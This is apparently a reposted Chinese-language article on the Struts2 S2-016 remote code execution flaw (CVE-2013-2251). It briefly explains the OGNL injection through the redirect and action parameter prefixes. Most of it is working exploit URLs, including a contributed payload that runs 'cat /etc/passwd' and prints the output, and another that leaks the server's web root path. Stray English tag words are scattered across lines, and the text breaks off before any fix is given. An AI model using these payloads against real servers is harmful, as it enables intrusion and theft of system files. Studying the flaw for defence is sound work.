Struts2再爆遠程代碼執行漏洞（S2-016）

時間 2019-11-11

標籤 struts2 struts 遠程代碼執行漏洞 s2 欄目 Struts 简体版

原文原文鏈接

Struts又爆遠程代碼執行漏洞了！在此次的漏洞中，攻擊者能夠經過操縱參數遠程執行惡意代碼。Struts 2.3.15.1以前的版本，參數action的值redirect以及redirectAction沒有正確過濾，致使ognl代碼執行。 html

描述 java

影響版本	 Struts 2.0.0 - Struts 2.3.15
報告者	 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE編號      CVE-2013-2251

漏洞證實 spring

參數會以OGNL表達式執行 express

http://host/struts2-blank/example/X.action?action:%25{3*4}

http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代碼執行 apache

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

漏洞原理 app

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with 「action:」 or 「redirect:」, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. ide

In Struts 2 before 2.3.15.1 the information following 「action:」, 「redirect:」 or 「redirectAction:」 is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. 網站

Apache官方地址 ui

國內網站受災嚴重 this

如下僅供教學研究之用，嚴禁非法用途！

執行任意命令EXP，感謝X提供：

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆網站路徑EXP，感謝h4ck0r提供：

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

升級struct2須要下列包